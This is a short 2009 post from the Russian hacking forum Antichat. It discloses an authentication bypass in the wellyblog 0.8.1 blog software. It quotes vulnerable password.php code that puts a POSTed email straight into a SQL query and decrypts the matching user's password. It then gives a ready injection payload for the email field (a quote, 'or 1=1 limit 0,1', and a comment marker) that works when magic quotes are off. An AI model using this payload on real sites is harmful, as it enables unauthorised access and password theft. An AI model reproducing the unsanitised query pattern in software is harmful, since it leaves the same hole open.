19.11.2009, 20:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
wellyblog-version-0.8.1
sourceforge.net/projects/wellyblog/
Обход авторизации
password.php
PHP код:
$email = $_POST['email'];
$tempsql="select username, password from tbluser where email='".$email."'";
$rspass=mysql_query($tempsql);
$num_rows=mysql_num_rows($rspass);
if($num_rows>0){
$decryptedpass=decrypt(mysql_result($rspass, 0, "password"), mysql_result($rspass, 0, "username"));
mq=off
$_POST['email']=bla@bla.com' or 1=1 limit 0,1 --
|
|
|